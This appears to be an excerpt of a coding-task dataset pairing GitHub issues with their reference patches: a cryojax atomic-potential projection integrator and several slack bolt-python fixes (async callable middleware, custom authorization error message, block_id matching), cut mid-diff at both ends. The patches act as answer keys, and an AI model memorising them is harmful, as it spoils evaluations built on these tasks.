AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
FourierSliceExtraction as FourierSliceExtraction,
+ GaussianMixtureProjection as GaussianMixtureProjection,
NufftProjection as NufftProjection,
)
from ._potential_representation import (
diff --git a/src/cryojax/simulator/_potential_integrator/__init__.py b/src/cryojax/simulator/_potential_integrator/__init__.py
index c1067e68..6085fa52 100644
--- a/src/cryojax/simulator/_potential_integrator/__init__.py
+++ b/src/cryojax/simulator/_potential_integrator/__init__.py
@@ -1,3 +1,6 @@
+from .atom_potential_integrator import (
+ GaussianMixtureProjection as GaussianMixtureProjection,
+)
from .base_potential_integrator import (
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
diff --git a/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
new file mode 100644
index 00000000..fe128430
--- /dev/null
+++ b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
@@ -0,0 +1,146 @@
+from typing import Optional
+from typing_extensions import override
+
+import jax
+import jax.numpy as jnp
+from jaxtyping import Array, Complex, Float
+
+from ...coordinates._make_coordinate_grids import _make_coordinates_or_frequencies_1d
+from ...image import downsample_with_fourier_cropping, rfftn
+from .._instrument_config import InstrumentConfig
+from .._potential_representation import (
+ GaussianMixtureAtomicPotential,
+ PengAtomicPotential,
+)
+from .base_potential_integrator import AbstractPotentialIntegrator
+
+
+class GaussianMixtureProjection(
+ AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential],
+ strict=True,
+):
+ upsampling_factor: Optional[float | int]
+
+ def __init__(
+ self,
+ *,
+ upsampling_factor: float | int = 1,
+ ):
+ """**Arguments:**
+ `upsampling_factor`: The factor by which to upsample the computation of the images. If `upsampling_factor` is greater than 1, the images will be computed at a higher resolution and then downsampled to the original resolution. This can be useful for reducing aliasing artifacts in the images.
+ """ # noqa: E501
+ self.upsampling_factor = upsampling_factor
+
+ @override
+ def compute_fourier_integrated_potential(
+ self,
+ potential: GaussianMixtureAtomicPotential | PengAtomicPotential,
+ instrument_config: InstrumentConfig,
+ ) -> Complex[
+ Array, "{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}"
+ ]:
+ """Compute a projection from the atomic potential and transform it to Fourier space
+
+ **Arguments:**
+ - `potential`: The atomic potential to project.
+ - `instrument_config`: The configuration of the imaging instrument.
+
+ **Returns:**
+ The Fourier transform of the integrated potential.
+ """ # noqa: E501
+
+ pixel_size = instrument_config.pixel_size / self.upsampling_factor
+ shape = (
+ instrument_config.padded_y_dim * self.upsampling_factor,
+ instrument_config.padded_x_dim * self.upsampling_factor,
+ )
+
+ grid_x = _make_coordinates_or_frequencies_1d(
+ shape[1], pixel_size, real_space=True
+ )
+ grid_y = _make_coordinates_or_frequencies_1d(
+ shape[0], pixel_size, real_space=True
+ )
+
+ if isinstance(potential, PengAtomicPotential):
+ if potential.b_factors is None:
+ gaussian_widths = potential.scattering_factor_b
+ else:
+ gaussian_widths = (
+ potential.scattering_factor_b + potential.b_factors[:, None]
+ )
+
+ gaussian_amplitudes = potential.scattering_factor_a
+
+ elif isinstance(potential, GaussianMixtureAtomicPotential):
+ gaussian_amplitudes = potential.gaussian_strengths
+ gaussian_widths = potential.gaussian_widths
+
+ else:
+ raise ValueError(
+ "Supported types for `potential` are `PengAtomicPotential` and "
+ " `GaussianMixtureAtomicPotential`."
+ )
+
+ projection = _evaluate_2d_real_space_gaussian(
+ grid_x,
+ grid_y,
+ potential.atom_positions,
+ gaussian_amplitudes,
+ gaussian_widths,
+ )
+
+ if self.upsampling_factor > 1:
+ projection = downsample_with_fourier_cropping(
+ projection, self.upsampling_factor
+ )
+ # Go to fourier space in cryojax's conventions
+ return rfftn(projection)
+
+
[email protected]
+def _evaluate_2d_real_space_gaussian(
+ grid_x: Float[Array, " x_dim"],
+ grid_y: Float[Array, " y_dim"],
+ atom_positions: Float[Array, "n_atoms 3"],
+ a: Float[Array, "n_atoms n_gaussians_per_atom"],
+ b: Float[Array, "n_atoms n_gaussians_per_atom"],
+) -> Float[Array, "y_dim x_dim"]:
+ """Evaluate a gaussian on a 3D grid.
+
+ **Arguments:**
+
+ - `grid_x`: The x-coordinates of the grid.
+ - `grid_y`: The y-coordinates of the grid.
+ - `pos`: The center of the gaussian.
+ - `a`: A scale factor.
+ - `b`: The scale of the gaussian.
+
+ **Returns:**
+
+ The potential of the gaussian on the grid.
+ """
+
+ b_inverse = 4.0 * jnp.pi / b
+
+ gauss_x = (
+ jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_x[:, None] - atom_positions.T[0, :]) ** 2)[:, :, None]
+ )
+ * a[None, :, :]
+ * b_inverse[None, :, :]
+ )
+ gauss_y = jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_y[:, None] - atom_positions.T[1, :]) ** 2)[:, :, None]
+ )
+
+ gauss_x = jnp.transpose(gauss_x, (2, 1, 0))
+ gauss_y = jnp.transpose(gauss_y, (2, 0, 1))
+
+ image = 4 * jnp.pi * jnp.sum(jnp.matmul(gauss_y, gauss_x), axis=0)
+
+ return image
| Implement integrator that simulates an image from an atom potential directly
| In order to do this, we would just have to make a subclass of the `cryojax.simulator.AbstractPotentialIntegrator`, and then we could write something like
```python
from typing_extensions import override
from jaxtyping import Array, Complex
from cryojax.image import rfftn
class GaussianMixtureProjection(AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential], strict=True):
def __init__(...):
# Initialize any parameters for the algorithm we want to be able to tune
@override
def compute_fourier_integrated_potential(potential: GaussianMixtureAtomicPotential | PengAtomicPotential, instrument_config: InstrumentConfig) -> Complex[Array, '{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}']:
# Grab information from the `instrument_config` like the `instrument_config.pixel_size` and
# `instrument_config.padded_shape` and do some things
...
# Compute the projection in real space, assuming that the `potential` is already at the rotation
# we want
projection = ...
# Go to fourier space in cryojax's conventions
return rfftn(projection)
```
Then this should work with everything in cryojax!
A few implementation points
- Maybe the `__init__` should take in a parameter that specifies how much to upsample the image? Then we can do fourier cropping before returning the image. This would be a candidate for something that would belong in an abstract base class (but it wouldn’t be necessary to do this)
- We should analytically work out the projection integral, starting with the expression in the docs for `PengAtomicPotential.as_real_voxel_grid`. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
> We should analytically work out the projection integral, starting with the expression in the docs for PengAtomicPotential.as_real_voxel_grid. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
It simply changes the b^(3/2) to b
Ah of course that’s right! | 2024-05-17T17:42:41 | 0.0 | [] | [] |
||
slackapi/bolt-python | slackapi__bolt-python-1132 | 40f6d1e46cdf8f958ad682c9ae0aeb73d27ce616 | diff --git a/slack_bolt/app/async_app.py b/slack_bolt/app/async_app.py
index 7e984c5d9..89a5124a3 100644
--- a/slack_bolt/app/async_app.py
+++ b/slack_bolt/app/async_app.py
@@ -24,7 +24,7 @@
AsyncMessageListenerMatches,
)
from slack_bolt.oauth.async_internals import select_consistent_installation_store
-from slack_bolt.util.utils import get_name_for_callable
+from slack_bolt.util.utils import get_name_for_callable, is_coroutine_function
from slack_bolt.workflows.step.async_step import (
AsyncWorkflowStep,
AsyncWorkflowStepBuilder,
@@ -778,7 +778,7 @@ async def custom_error_handler(error, body, logger):
func: The function that is supposed to be executed
when getting an unhandled error in Bolt app.
"""
- if not inspect.iscoroutinefunction(func):
+ if not is_coroutine_function(func):
name = get_name_for_callable(func)
raise BoltError(error_listener_function_must_be_coro_func(name))
self._async_listener_runner.listener_error_handler = AsyncCustomListenerErrorHandler(
@@ -1410,7 +1410,7 @@ def _register_listener(
value_to_return = functions[0]
for func in functions:
- if not inspect.iscoroutinefunction(func):
+ if not is_coroutine_function(func):
name = get_name_for_callable(func)
raise BoltError(error_listener_function_must_be_coro_func(name))
@@ -1422,7 +1422,7 @@ def _register_listener(
for m in middleware or []:
if isinstance(m, AsyncMiddleware):
listener_middleware.append(m)
- elif isinstance(m, Callable) and inspect.iscoroutinefunction(m):
+ elif isinstance(m, Callable) and is_coroutine_function(m):
listener_middleware.append(AsyncCustomMiddleware(app_name=self.name, func=m, base_logger=self._base_logger))
else:
raise ValueError(error_unexpected_listener_middleware(type(m)))
diff --git a/slack_bolt/middleware/async_custom_middleware.py b/slack_bolt/middleware/async_custom_middleware.py
index e2060b75c..a8f2a0f9d 100644
--- a/slack_bolt/middleware/async_custom_middleware.py
+++ b/slack_bolt/middleware/async_custom_middleware.py
@@ -1,4 +1,3 @@
-import inspect
from logging import Logger
from typing import Callable, Awaitable, Any, Sequence, Optional
@@ -7,7 +6,7 @@
from slack_bolt.request.async_request import AsyncBoltRequest
from slack_bolt.response import BoltResponse
from .async_middleware import AsyncMiddleware
-from slack_bolt.util.utils import get_name_for_callable, get_arg_names_of_callable
+from slack_bolt.util.utils import get_name_for_callable, get_arg_names_of_callable, is_coroutine_function
class AsyncCustomMiddleware(AsyncMiddleware):
@@ -24,7 +23,7 @@ def __init__(
base_logger: Optional[Logger] = None,
):
self.app_name = app_name
- if inspect.iscoroutinefunction(func):
+ if is_coroutine_function(func):
self.func = func
else:
raise ValueError("Async middleware function must be an async function")
diff --git a/slack_bolt/util/utils.py b/slack_bolt/util/utils.py
index efb815399..a5bcdbe5f 100644
--- a/slack_bolt/util/utils.py
+++ b/slack_bolt/util/utils.py
@@ -88,3 +88,9 @@ def get_name_for_callable(func: Callable) -> str:
def get_arg_names_of_callable(func: Callable) -> List[str]:
return inspect.getfullargspec(inspect.unwrap(func)).args
+
+
+def is_coroutine_function(func: Optional[Any]) -> bool:
+ return func is not None and (
+ inspect.iscoroutinefunction(func) or (hasattr(func, "__call__") and inspect.iscoroutinefunction(func.__call__))
+ )
| A class with async "__call__" method fails to work as a middleware
(Filling out the following details about bugs will help us solve your issue sooner.)
### Reproducible in:
```bash
pip freeze | grep slack
python --version
sw_vers && uname -v # or `ver`
```
#### The `slack_bolt` version
```bash
slack-bolt==1.18.1
slack_sdk==3.31.0
```
#### Python runtime version
```bash
Python 3.11.9
```
#### OS info
```bash
bash: sw_vers: command not found
❯ uname -a
Linux 49d1cffcb728 6.8.4-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 4 20:45:21 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```
#### Steps to reproduce:
(Share the commands to run, source code, and project settings (e.g., setup.py))
```python
from slack_bolt.app.async_app import AsyncApp
class MyCallableMiddleware:
async def __call__(self, next_) -> None:
await next_()
app = AsyncApp()
app.middleware(MyCallableMiddleware()) # this raises `ValueError: Async middleware function must be an async function`
```
### Expected result:
`AsyncApp.middleware` accepts _any_ `Callable[..., Awaitable[Any]]` object, per signature.
### Actual result:
The middleware instance pass the callable check here
https://github.com/slackapi/bolt-python/blob/main/slack_bolt/app/async_app.py#L678
and is thus sent to `AsyncCustomMiddleware` init here
https://github.com/slackapi/bolt-python/blob/main/slack_bolt/middleware/async_custom_middleware.py#L13
where the signature for `func` is `Callable[..., Awaitable[Any]]` (which my middleware instance is).
However, `inspect.iscoroutinefunction` is used to check `func`, which _does not pass_, as it checks for the existence of
`CO_COROUTINE` flag (see here: [CPython source](https://github.com/python/cpython/blob/v3.11.9/Lib/inspect.py#L414)),
despite the instance being both callable and asynchronous.
## Requirements
Please read the [Contributing guidelines](https://github.com/slackapi/bolt-python/blob/main/.github/contributing.md) and [Code of Conduct](https://slackhq.github.io/code-of-conduct) before creating this issue or pull request. By submitting, you are agreeing to those rules.
A class with async "__call__" method fails to work as a middleware
(Filling out the following details about bugs will help us solve your issue sooner.)
### Reproducible in:
```bash
pip freeze | grep slack
python --version
sw_vers && uname -v # or `ver`
```
#### The `slack_bolt` version
```bash
slack-bolt==1.18.1
slack_sdk==3.31.0
```
#### Python runtime version
```bash
Python 3.11.9
```
#### OS info
```bash
bash: sw_vers: command not found
❯ uname -a
Linux 49d1cffcb728 6.8.4-200.fc39.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 4 20:45:21 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```
#### Steps to reproduce:
(Share the commands to run, source code, and project settings (e.g., setup.py))
```python
from slack_bolt.app.async_app import AsyncApp
class MyCallableMiddleware:
async def __call__(self, next_) -> None:
await next_()
app = AsyncApp()
app.middleware(MyCallableMiddleware()) # this raises `ValueError: Async middleware function must be an async function`
```
### Expected result:
`AsyncApp.middleware` accepts _any_ `Callable[..., Awaitable[Any]]` object, per signature.
### Actual result:
The middleware instance pass the callable check here
https://github.com/slackapi/bolt-python/blob/main/slack_bolt/app/async_app.py#L678
and is thus sent to `AsyncCustomMiddleware` init here
https://github.com/slackapi/bolt-python/blob/main/slack_bolt/middleware/async_custom_middleware.py#L13
where the signature for `func` is `Callable[..., Awaitable[Any]]` (which my middleware instance is).
However, `inspect.iscoroutinefunction` is used to check `func`, which _does not pass_, as it checks for the existence of
`CO_COROUTINE` flag (see here: [CPython source](https://github.com/python/cpython/blob/v3.11.9/Lib/inspect.py#L414)),
despite the instance being both callable and asynchronous.
## Requirements
Please read the [Contributing guidelines](https://github.com/slackapi/bolt-python/blob/main/.github/contributing.md) and [Code of Conduct](https://slackhq.github.io/code-of-conduct) before creating this issue or pull request. By submitting, you are agreeing to those rules.
| Hi @chet-manley, thanks for reporting this issue. The built-in inspect library's behaviuor is a bit surprising, but it seems this scenario should be supported. I found a workaround on bolt-python side, so will come up with a pull request resolving it. Once it's merged, we will release a new patch release fixing the issue.
Hi @chet-manley, thanks for reporting this issue. The built-in inspect library's behaviuor is a bit surprising, but it seems this scenario should be supported. I found a workaround on bolt-python side, so will come up with a pull request resolving it. Once it's merged, we will release a new patch release fixing the issue. | 2024-08-21T07:26:30 | 0.0 | [] | [] |
||
slackapi/bolt-python | slackapi__bolt-python-1077 | e5131c9b9ccd5be58926df254356c5ca3159c147 | diff --git a/slack_bolt/app/app.py b/slack_bolt/app/app.py
index d01163636..a2e4f3aca 100644
--- a/slack_bolt/app/app.py
+++ b/slack_bolt/app/app.py
@@ -103,6 +103,7 @@ def __init__(
# for multi-workspace apps
before_authorize: Optional[Union[Middleware, Callable[..., Any]]] = None,
authorize: Optional[Callable[..., AuthorizeResult]] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
installation_store: Optional[InstallationStore] = None,
# for either only bot scope usage or v1.0.x compatibility
installation_store_bot_only: Optional[bool] = None,
@@ -159,6 +160,8 @@ def message_hello(message, say):
before_authorize: A global middleware that can be executed right before authorize function
authorize: The function to authorize an incoming request from Slack
by checking if there is a team/user in the installation data.
+ user_facing_authorize_error_message: The user-facing error message to display
+ when the app is installed but the installation is not managed by this app's installation store
installation_store: The module offering save/find operations of installation data
installation_store_bot_only: Use `InstallationStore#find_bot()` if True (Default: False)
request_verification_enabled: False if you would like to disable the built-in middleware (Default: True).
@@ -178,7 +181,7 @@ def message_hello(message, say):
`SslCheck` is a built-in middleware that handles ssl_check requests from Slack.
oauth_settings: The settings related to Slack app installation flow (OAuth flow)
oauth_flow: Instantiated `slack_bolt.oauth.OAuthFlow`. This is always prioritized over oauth_settings.
- verification_token: Deprecated verification mechanism. This can used only for ssl_check requests.
+ verification_token: Deprecated verification mechanism. This can be used only for ssl_check requests.
listener_executor: Custom executor to run background tasks. If absent, the default `ThreadPoolExecutor` will
be used.
"""
@@ -348,6 +351,7 @@ def message_hello(message, say):
ignoring_self_events_enabled=ignoring_self_events_enabled,
ssl_check_enabled=ssl_check_enabled,
url_verification_enabled=url_verification_enabled,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
def _init_middleware_list(
@@ -357,6 +361,7 @@ def _init_middleware_list(
ignoring_self_events_enabled: bool = True,
ssl_check_enabled: bool = True,
url_verification_enabled: bool = True,
+ user_facing_authorize_error_message: Optional[str] = None,
):
if self._init_middleware_list_done:
return
@@ -385,13 +390,18 @@ def _init_middleware_list(
SingleTeamAuthorization(
auth_test_result=auth_test_result,
base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
)
except SlackApiError as err:
raise BoltError(error_auth_test_failure(err.response))
elif self._authorize is not None:
self._middleware_list.append(
- MultiTeamsAuthorization(authorize=self._authorize, base_logger=self._base_logger)
+ MultiTeamsAuthorization(
+ authorize=self._authorize,
+ base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
+ )
)
else:
raise BoltError(error_token_required())
@@ -401,6 +411,7 @@ def _init_middleware_list(
authorize=self._authorize,
base_logger=self._base_logger,
user_token_resolution=self._oauth_flow.settings.user_token_resolution,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
)
if ignoring_self_events_enabled is True:
diff --git a/slack_bolt/app/async_app.py b/slack_bolt/app/async_app.py
index c70fc2e54..6f3366a19 100644
--- a/slack_bolt/app/async_app.py
+++ b/slack_bolt/app/async_app.py
@@ -114,6 +114,7 @@ def __init__(
# for multi-workspace apps
before_authorize: Optional[Union[AsyncMiddleware, Callable[..., Awaitable[Any]]]] = None,
authorize: Optional[Callable[..., Awaitable[AuthorizeResult]]] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
installation_store: Optional[AsyncInstallationStore] = None,
# for either only bot scope usage or v1.0.x compatibility
installation_store_bot_only: Optional[bool] = None,
@@ -167,6 +168,8 @@ async def message_hello(message, say): # async function
before_authorize: A global middleware that can be executed right before authorize function
authorize: The function to authorize an incoming request from Slack
by checking if there is a team/user in the installation data.
+ user_facing_authorize_error_message: The user-facing error message to display
+ when the app is installed but the installation is not managed by this app's installation store
installation_store: The module offering save/find operations of installation data
installation_store_bot_only: Use `AsyncInstallationStore#async_find_bot()` if True (Default: False)
request_verification_enabled: False if you would like to disable the built-in middleware (Default: True).
@@ -354,6 +357,7 @@ async def message_hello(message, say): # async function
ignoring_self_events_enabled=ignoring_self_events_enabled,
ssl_check_enabled=ssl_check_enabled,
url_verification_enabled=url_verification_enabled,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
self._server: Optional[AsyncSlackAppServer] = None
@@ -364,6 +368,7 @@ def _init_async_middleware_list(
ignoring_self_events_enabled: bool = True,
ssl_check_enabled: bool = True,
url_verification_enabled: bool = True,
+ user_facing_authorize_error_message: Optional[str] = None,
):
if self._init_middleware_list_done:
return
@@ -383,10 +388,19 @@ def _init_async_middleware_list(
# As authorize is required for making a Bolt app function, we don't offer the flag to disable this
if self._async_oauth_flow is None:
if self._token:
- self._async_middleware_list.append(AsyncSingleTeamAuthorization(base_logger=self._base_logger))
+ self._async_middleware_list.append(
+ AsyncSingleTeamAuthorization(
+ base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
+ )
+ )
elif self._async_authorize is not None:
self._async_middleware_list.append(
- AsyncMultiTeamsAuthorization(authorize=self._async_authorize, base_logger=self._base_logger)
+ AsyncMultiTeamsAuthorization(
+ authorize=self._async_authorize,
+ base_logger=self._base_logger,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
+ )
)
else:
raise BoltError(error_token_required())
@@ -396,6 +410,7 @@ def _init_async_middleware_list(
authorize=self._async_authorize,
base_logger=self._base_logger,
user_token_resolution=self._async_oauth_flow.settings.user_token_resolution,
+ user_facing_authorize_error_message=user_facing_authorize_error_message,
)
)
diff --git a/slack_bolt/middleware/authorization/async_internals.py b/slack_bolt/middleware/authorization/async_internals.py
index e465d50d2..b5d8264ca 100644
--- a/slack_bolt/middleware/authorization/async_internals.py
+++ b/slack_bolt/middleware/authorization/async_internals.py
@@ -1,4 +1,3 @@
-from slack_bolt.middleware.authorization.internals import _build_error_text
from slack_bolt.request.async_request import AsyncBoltRequest
from slack_bolt.response import BoltResponse
@@ -15,9 +14,9 @@ def _is_no_auth_required(req: AsyncBoltRequest) -> bool:
return _is_url_verification(req) or _is_ssl_check(req)
-def _build_error_response() -> BoltResponse:
+def _build_user_facing_error_response(message: str) -> BoltResponse:
# show an ephemeral message to the end-user
return BoltResponse(
status=200,
- body=_build_error_text(),
+ body=message,
)
diff --git a/slack_bolt/middleware/authorization/async_multi_teams_authorization.py b/slack_bolt/middleware/authorization/async_multi_teams_authorization.py
index 3a89f0f2b..cbb38bc2f 100644
--- a/slack_bolt/middleware/authorization/async_multi_teams_authorization.py
+++ b/slack_bolt/middleware/authorization/async_multi_teams_authorization.py
@@ -6,8 +6,8 @@
from slack_bolt.request.async_request import AsyncBoltRequest
from slack_bolt.response import BoltResponse
from .async_authorization import AsyncAuthorization
-from .async_internals import _build_error_response, _is_no_auth_required
-from .internals import _is_no_auth_test_call_required, _build_error_text
+from .async_internals import _build_user_facing_error_response, _is_no_auth_required
+from .internals import _is_no_auth_test_call_required, _build_user_facing_authorize_error_message
from ...authorization import AuthorizeResult
from ...authorization.async_authorize import AsyncAuthorize
@@ -21,6 +21,7 @@ def __init__(
authorize: AsyncAuthorize,
base_logger: Optional[Logger] = None,
user_token_resolution: str = "authed_user",
+ user_facing_authorize_error_message: Optional[str] = None,
):
"""Multi-workspace authorization.
@@ -28,10 +29,14 @@ def __init__(
authorize: The function to authorize incoming requests from Slack.
base_logger: The base logger
user_token_resolution: "authed_user" or "actor"
+ user_facing_authorize_error_message: The user-facing error message when installation is not found
"""
self.authorize = authorize
self.logger = get_bolt_logger(AsyncMultiTeamsAuthorization, base_logger=base_logger)
self.user_token_resolution = user_token_resolution
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
async def async_process(
self,
@@ -92,10 +97,10 @@ async def async_process(
"the AuthorizeResult (returned value from authorize) for it was not found."
)
if req.context.response_url is not None:
- await req.context.respond(_build_error_text())
+ await req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
diff --git a/slack_bolt/middleware/authorization/async_single_team_authorization.py b/slack_bolt/middleware/authorization/async_single_team_authorization.py
index 8d3555a0e..695e17144 100644
--- a/slack_bolt/middleware/authorization/async_single_team_authorization.py
+++ b/slack_bolt/middleware/authorization/async_single_team_authorization.py
@@ -7,16 +7,23 @@
from slack_bolt.response import BoltResponse
from slack_sdk.web.async_slack_response import AsyncSlackResponse
from slack_sdk.errors import SlackApiError
-from .async_internals import _build_error_response, _is_no_auth_required
-from .internals import _to_authorize_result, _is_no_auth_test_call_required, _build_error_text
+from .async_internals import _build_user_facing_error_response, _is_no_auth_required
+from .internals import _to_authorize_result, _is_no_auth_test_call_required, _build_user_facing_authorize_error_message
from ...authorization import AuthorizeResult
class AsyncSingleTeamAuthorization(AsyncAuthorization):
- def __init__(self, base_logger: Optional[Logger] = None):
+ def __init__(
+ self,
+ base_logger: Optional[Logger] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
+ ):
"""Single-workspace authorization."""
self.auth_test_result: Optional[AsyncSlackResponse] = None
self.logger = get_bolt_logger(AsyncSingleTeamAuthorization, base_logger=base_logger)
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
async def async_process(
self,
@@ -58,9 +65,9 @@ async def async_process(
# Just in case
self.logger.error("auth.test API call result is unexpectedly None")
if req.context.response_url is not None:
- await req.context.respond(_build_error_text())
+ await req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
diff --git a/slack_bolt/middleware/authorization/internals.py b/slack_bolt/middleware/authorization/internals.py
index af264854b..814101953 100644
--- a/slack_bolt/middleware/authorization/internals.py
+++ b/slack_bolt/middleware/authorization/internals.py
@@ -43,18 +43,18 @@ def _is_no_auth_test_call_required(req: Union[BoltRequest, "AsyncBoltRequest"])
return _is_no_auth_test_events(req)
-def _build_error_text() -> str:
+def _build_user_facing_authorize_error_message() -> str:
return (
":warning: We apologize, but for some unknown reason, your installation with this app is no longer available. "
"Please reinstall this app into your workspace :bow:"
)
-def _build_error_response() -> BoltResponse:
+def _build_user_facing_error_response(message: str) -> BoltResponse:
# show an ephemeral message to the end-user
return BoltResponse(
status=200,
- body=_build_error_text(),
+ body=message,
)
diff --git a/slack_bolt/middleware/authorization/multi_teams_authorization.py b/slack_bolt/middleware/authorization/multi_teams_authorization.py
index 5d464d5e4..62972284b 100644
--- a/slack_bolt/middleware/authorization/multi_teams_authorization.py
+++ b/slack_bolt/middleware/authorization/multi_teams_authorization.py
@@ -8,10 +8,10 @@
from slack_bolt.response import BoltResponse
from .authorization import Authorization
from .internals import (
- _build_error_response,
+ _build_user_facing_error_response,
_is_no_auth_required,
_is_no_auth_test_call_required,
- _build_error_text,
+ _build_user_facing_authorize_error_message,
)
from ...authorization import AuthorizeResult
from ...authorization.authorize import Authorize
@@ -27,6 +27,7 @@ def __init__(
authorize: Authorize,
base_logger: Optional[Logger] = None,
user_token_resolution: str = "authed_user",
+ user_facing_authorize_error_message: Optional[str] = None,
):
"""Multi-workspace authorization.
@@ -34,10 +35,14 @@ def __init__(
authorize: The function to authorize incoming requests from Slack.
base_logger: The base logger
user_token_resolution: "authed_user" or "actor"
+ user_facing_authorize_error_message: The user-facing error message when installation is not found
"""
self.authorize = authorize
self.logger = get_bolt_logger(MultiTeamsAuthorization, base_logger=base_logger)
self.user_token_resolution = user_token_resolution
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
def process(
self,
@@ -95,10 +100,10 @@ def process(
"the AuthorizeResult (returned value from authorize) for it was not found."
)
if req.context.response_url is not None:
- req.context.respond(_build_error_text())
+ req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
diff --git a/slack_bolt/middleware/authorization/single_team_authorization.py b/slack_bolt/middleware/authorization/single_team_authorization.py
index 54cdff5c8..6fe62ed6a 100644
--- a/slack_bolt/middleware/authorization/single_team_authorization.py
+++ b/slack_bolt/middleware/authorization/single_team_authorization.py
@@ -8,11 +8,11 @@
from slack_sdk.errors import SlackApiError
from slack_sdk.web import SlackResponse
from .internals import (
- _build_error_response,
+ _build_user_facing_error_response,
_is_no_auth_required,
_to_authorize_result,
_is_no_auth_test_call_required,
- _build_error_text,
+ _build_user_facing_authorize_error_message,
)
from ...authorization import AuthorizeResult
@@ -23,6 +23,7 @@ def __init__(
*,
auth_test_result: Optional[SlackResponse] = None,
base_logger: Optional[Logger] = None,
+ user_facing_authorize_error_message: Optional[str] = None,
):
"""Single-workspace authorization.
@@ -32,6 +33,9 @@ def __init__(
"""
self.auth_test_result = auth_test_result
self.logger = get_bolt_logger(SingleTeamAuthorization, base_logger=base_logger)
+ self.user_facing_authorize_error_message = (
+ user_facing_authorize_error_message or _build_user_facing_authorize_error_message()
+ )
def process(
self,
@@ -73,9 +77,9 @@ def process(
# Just in case
self.logger.error("auth.test API call result is unexpectedly None")
if req.context.response_url is not None:
- req.context.respond(_build_error_text())
+ req.context.respond(self.user_facing_authorize_error_message)
return BoltResponse(status=200, body="")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
except SlackApiError as e:
self.logger.error(f"Failed to authorize with the given token ({e})")
- return _build_error_response()
+ return _build_user_facing_error_response(self.user_facing_authorize_error_message)
| Customize user-facing message sent when an installation is not managed by bolt-python app
Hello I have a question regarding a message that user receives when has not installed the app or completed the oAuth flow.
When a user click a button or execute an slack command receives the following message
`We apologize, but for some unknown reason, your installation with this app is no longer available. Please reinstall this app into your workspace`
My question: is there a way to do not send this message to the user or send a custom message instead?
Customize user-facing message sent when an installation is not managed by bolt-python app
Hello I have a question regarding a message that user receives when has not installed the app or completed the oAuth flow.
When a user click a button or execute an slack command receives the following message
`We apologize, but for some unknown reason, your installation with this app is no longer available. Please reinstall this app into your workspace`
My question: is there a way to do not send this message to the user or send a custom message instead?
| Hi @escc86, thanks for writing in. At this moment, there is no way to customize the message, but I agree this could be a valid feature request. I may enhance the built-in middleware in future releases: https://github.com/slackapi/bolt-python/blob/v1.18.1/slack_bolt/middleware/authorization/multi_teams_authorization.py#L90-L100
Hi @escc86, thanks for writing in. At this moment, there is no way to customize the message, but I agree this could be a valid feature request. I may enhance the built-in middleware in future releases: https://github.com/slackapi/bolt-python/blob/v1.18.1/slack_bolt/middleware/authorization/multi_teams_authorization.py#L90-L100 | 2024-05-08T03:55:21 | 0.0 | [] | [] |
||
slackapi/bolt-python | slackapi__bolt-python-990 | 970956bf1599c758f17527fc5591bc201824013b | diff --git a/slack_bolt/listener_matcher/builtins.py b/slack_bolt/listener_matcher/builtins.py
index e19a25121..c6547f919 100644
--- a/slack_bolt/listener_matcher/builtins.py
+++ b/slack_bolt/listener_matcher/builtins.py
@@ -292,7 +292,7 @@ def func(body: Dict[str, Any]) -> bool:
return workflow_step_edit(constraints["callback_id"], asyncio)
raise BoltError(f"type: {action_type} is unsupported")
- elif "action_id" in constraints:
+ elif "action_id" in constraints or "block_id" in constraints:
# The default value is "block_actions"
return block_action(constraints, asyncio)
@@ -313,8 +313,11 @@ def _block_action(
elif isinstance(constraints, dict):
# block_id matching is optional
